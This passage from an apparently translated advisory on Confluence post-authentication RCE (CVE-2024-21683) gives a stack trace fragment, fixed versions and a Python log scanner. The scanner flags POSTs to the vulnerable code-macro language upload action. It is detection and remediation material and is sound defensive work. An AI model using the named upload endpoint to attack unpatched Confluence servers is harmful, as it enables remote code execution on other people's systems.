ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:37, HeaderSanitisingFilter (com.atlassian.core.filters), HeaderSanitisingFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:64, FourOhFourErrorLoggingFilter (com.atlassian.confluence.servlet), 
FourOhFourErrorLoggingFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:35, IpdHttpMonitoringFilter (com.atlassian.confluence.internal.diagnostics.ipd.http), IpdHttpMonitoringFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:42, HttpRequestMonitoringFilter (com.atlassian.confluence.internal.diagnostics), HttpRequestMonitoringFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:129, HttpHeaderSecurityFilter (org.apache.catalina.filters), HttpHeaderSecurityFilter.javadoFilter:48, ConfluenceHttpHeaderSecurityFilter (com.atlassian.confluence.impl.webapp), ConfluenceHttpHeaderSecurityFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:63, DebugFilter (com.atlassian.confluence.web.filter), DebugFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javainvoke:168, StandardWrapperValve (org.apache.catalina.core), StandardWrapperValve.javainvoke:90, StandardContextValve (org.apache.catalina.core), StandardContextValve.javainvoke:481, AuthenticatorBase (org.apache.catalina.authenticator), AuthenticatorBase.javainvoke:765, RemoteIpValve (org.apache.catalina.valves), RemoteIpValve.javainvoke:670, AbstractAccessLogValve 
(org.apache.catalina.valves), AbstractAccessLogValve.javainvoke:185, StuckThreadDetectionValve (org.apache.catalina.valves), StuckThreadDetectionValve.javainvoke:130, StandardHostValve (org.apache.catalina.core), StandardHostValve.javainvoke:93, ErrorReportValve (org.apache.catalina.valves), ErrorReportValve.javainvoke:74, StandardEngineValve (org.apache.catalina.core), StandardEngineValve.javaservice:342, CoyoteAdapter (org.apache.catalina.connector), CoyoteAdapter.javaservice:390, Http11Processor (org.apache.coyote.http11), Http11Processor.javaprocess:63, AbstractProcessorLight (org.apache.coyote), AbstractProcessorLight.javaprocess:928, AbstractProtocol$ConnectionHandler (org.apache.coyote), AbstractProtocol.javadoRun:1794, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net), NioEndpoint.javarun:52, SocketProcessorBase (org.apache.tomcat.util.net), SocketProcessorBase.javarunWorker:1191, ThreadPoolExecutor (org.apache.tomcat.util.threads), ThreadPoolExecutor.javarun:659, ThreadPoolExecutor$Worker (org.apache.tomcat.util.threads), ThreadPoolExecutor.javarun:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads), TaskThread.javarun:829, Thread (java.lang), Thread.java
Remediation

Upgrade to a fixed version:

  • 8.9.1 (Data Center only)
  • 8.5.9 (LTS), recommended
  • 7.19.22 (LTS)
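To check whether the upload endpoint used by the PoC script earlier on this page has been exercised on an instance, access logs can be searched for POSTs to `/admin/plugins/newcode/addlanguage.action`. The following is an added example, not code from the original article or from Atlassian; the combined-style log layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Paths taken from the PoC script shown on this page.
UPLOAD_PATH = "/admin/plugins/newcode/addlanguage.action"
WEBSUDO_PATH = "/doauthenticate.action"

# Assumption: combined-style lines (ip ident user [time] "request" status bytes).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample input (documentation IP ranges, invented users and times).
SAMPLE_LOG = """\
192.0.2.10 - alice [20/Jan/2025:10:01:02 +0000] "GET /dashboard.action HTTP/1.1" 200 5120
198.51.100.7 - admin [20/Jan/2025:10:02:11 +0000] "POST /doauthenticate.action HTTP/1.1" 302 0
198.51.100.7 - admin [20/Jan/2025:10:02:12 +0000] "GET /admin/plugins/newcode/configure.action HTTP/1.1" 200 8211
198.51.100.7 - admin [20/Jan/2025:10:02:13 +0000] "POST /admin/plugins/newcode/addlanguage.action HTTP/1.1" 200 9034
198.51.100.7 - admin [20/Jan/2025:10:02:40 +0000] "POST /confluence/admin/plugins/newcode/%61ddlanguage.action;jsessionid=X?a=1 HTTP/1.1" 200 9034
192.0.2.10 - alice [20/Jan/2025:10:03:00 +0000] "POST /admin/plugins/newcode/addlanguage.action HTTP/1.1" 403 312
this line is not an access-log record
"""


def normalize_path(target):
    """Reduce a request target to a path that can be compared reliably."""
    path = unquote(target.split("?", 1)[0])  # drop the query string, decode %xx
    # Drop ";jsessionid=..." style path parameters from every segment.
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return re.sub(r"/{2,}", "/", path)  # collapse repeated slashes


def scan(lines):
    """Return (hits, skipped): POSTs to the upload action and unparsable lines."""
    hits, skipped, websudo_ips = [], 0, set()
    for line in lines:
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            skipped += 1  # count rather than silently drop, so gaps are visible
            continue
        if m["method"] != "POST":
            continue
        path = normalize_path(m["target"])
        if path.endswith(WEBSUDO_PATH):
            websudo_ips.add(m["ip"])  # secure-admin-session step seen from this IP
        elif path.endswith(UPLOAD_PATH):  # endswith tolerates a context path prefix
            hits.append({
                "ip": m["ip"], "user": m["user"], "ts": m["ts"],
                "status": int(m["status"]), "path": path,
                "websudo_seen": m["ip"] in websudo_ips,
            })
    return hits, skipped


def summarize(hits):
    """Group hits by (source IP, user) for triage."""
    summary = defaultdict(lambda: {"count": 0, "statuses": set(), "first_seen": None})
    for h in hits:
        entry = summary[(h["ip"], h["user"])]
        entry["count"] += 1
        entry["statuses"].add(h["status"])
        entry["first_seen"] = entry["first_seen"] or h["ts"]
    return dict(summary)


if __name__ == "__main__":
    found, unparsed = scan(SAMPLE_LOG.splitlines())
    for (ip, user), info in summarize(found).items():
        print(ip, user, info["count"], sorted(info["statuses"]), info["first_seen"])
    print("unparsed lines:", unparsed)
```

A hit is not proof of exploitation, because administrators use the same action to add code macro languages; review who uploaded which file and when.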

Originally published on the WeChat official account OneTS安全团队: Confluence Post-Authentication RCE (CVE-2024-21683)
